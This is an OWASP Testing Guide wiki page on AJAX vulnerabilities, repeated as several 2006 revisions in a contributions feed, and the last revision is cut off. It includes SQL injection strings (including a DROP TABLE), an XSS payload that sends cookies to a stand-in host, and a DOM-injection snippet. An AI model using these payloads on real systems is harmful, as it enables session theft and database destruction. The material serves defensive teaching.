OWASP - User contributions [en]

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-12-04T18:46:34Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==

'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since AJAX is still a new technology, there are many security issues that have not yet been fully researched. Some of the security issues in AJAX include:

* Increased attack surface with many more inputs to secure
* Exposed internal functions of the application
* Client access to third-party resources with no built-in security and encoding mechanisms
* Failure to protect authentication information and sessions
* Blurred line between client-side and server-side code, resulting in security mistakes

== Attacks and Vulnerabilities ==

===XMLHttpRequest Vulnerabilities===

AJAX uses the XMLHttpRequest(XHR) object for all communication with a server-side application, frequently a web service. A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data, or anything else that Javascript can process.

Secondly, in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence, the login data is traversing the wire in clear text. Using secure HTTPS/SSLchannels which the modern day browsers support is the easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks such as SQL Injection, Cross Site Scripting(XSS), etc.

===Increased Attack Surface===

Unlike traditional web applications that exist completely on the server, AJAX applications extend across the client and server, which gives the client some powers. This throws in additional ways to potentially inject malicious content. 

===SQL Injection===

SQL Injection attacks are remote attacks on the database in which the attacker modifies the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty), and it is likely to be the first entry in the table. For many applications, that entry is the administrative login - the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query drops all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].

===Cross Site Scripting===

Cross Site Scripting is a technique by which malicious content is injected in form of HTML links, Javascripts Alerts, or error messages. XSS exploits can be used for triggering various other attacks like cookie theft, account hijacking, and denial of service.

The Browser and AJAX Requests look identical, so the server is not able to classify them. Consequently, it won't be able to discern who made the request in the background. A JavaScript program can use AJAX to request for a resource that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information such as cookies to the request. JavaScript code can then access the response to this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site Scripting (XSS) attack.

Also, a XSS attack could send requests for specific pages other than the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.

The XSS payload can use AJAX requests to autonomously inject itself into pages and easily re-inject the same host with more XSS (like a virus), all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

===Client Side Injection Threats===

* ''XSS exploits'' can give access to any client-side data, and can also modify the client-side code.
* ''DOM Injection'' is a type pf XSS injection which happens through the sub-objects ,document.location, document.URL, or document.referrer of the Document Object Model(DOM)

<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>
</pre>

* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content

===AJAX Bridging===

For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from yahoo.com cannot make connections to google.com. To allow AJAX to contact third-party sites in this manner, the AJAX service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection. An attacker could use this to access sites with restricted access. 

===Cross Site Request Forgery(CSRF)===

CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of his choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly, CSRF could have transfered funds, posted comments, compromised email lists, or reconfigured the network. When a victim is forced to make a CSRF request, it will be authenticated if they have recently logged-in. The worst part is all system logs would verify that you in fact made the request. This attack, though not common, has been done before. 

===Denial of Service===

Denial of Service is an old attack in which an attacker or vulnerable application forces the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. In fact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks such as using image tags nested within a JavaScript loop can do the trick more effectively. AJAX, being on the client-side, makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>

===Memory leaks===

===Browser Based Attacks===

The web browsers we use have not been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks, so our browsers are not prepared for newer attacks.

There have been a number of new attacks on browsers, such as using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These could be computers that serve Web pages, but they could also include routers, printers, IP phones, and other networked devices or applications that have a Web interface. The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines which servers are running by looking for image files stored in standard places and analyzing the traffic and error messages it receives back.

Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. In addition, the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

===MySpace Attack===

The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject a virus into the MySpace profile of any user viewing infected page and forced any user viewing the infected page to add the user “Samy” to his friend list. It also appended the words “Samy is my hero” to the victim's profile 

===Yahoo! Mail Attack===

In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and AJAX, took advantage of a vulnerability in Yahoo Mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the Yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which made it look like an email from a known user.

== Testing ==

* '''OWASP Testing Guide sections on AJAX Testing''' provides information on various aspects of AJAX Testing
* [[AJAX_Testing_AoC | 4.9 AJAX Testing ]]
* [[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]]

== Testing Tools ==

Here are some of the '''AJAX Testing Tools'''

* '''Venkman''' [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers.

* ''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and a test-generating and replaying add-on you can use with any web application.

* '''Squish/Web (froglogic)'''
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows you to record, edit, and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests.

* '''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

*[http://ajaxpatterns.org AJAX Patterns]

===Whitepapers===

*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 

*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 

*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

===Articles===

*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 

*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T11:11:40Z

Anushshetty: /* Attacks and Vulnerabilities */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''AJAX Bridging''' 
For security purposes, AJAX applications can only connect back to the Website from which they come. For example, JavaScript with AJAX downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
'''OWASP Testing Guide sections on AJAX Testing''' provides you a very good information on various aspects of AJAX Testing. 
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Venkman''' [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. 
''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 
*[http://ajaxpatterns.org AJAX Patterns]

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T11:08:47Z

Anushshetty: /* Testing */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
'''OWASP Testing Guide sections on AJAX Testing''' provides you a very good information on various aspects of AJAX Testing. 
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Venkman''' [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. 
''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 
*[http://ajaxpatterns.org AJAX Patterns]

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T11:06:06Z

Anushshetty: /* Testing Tools */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
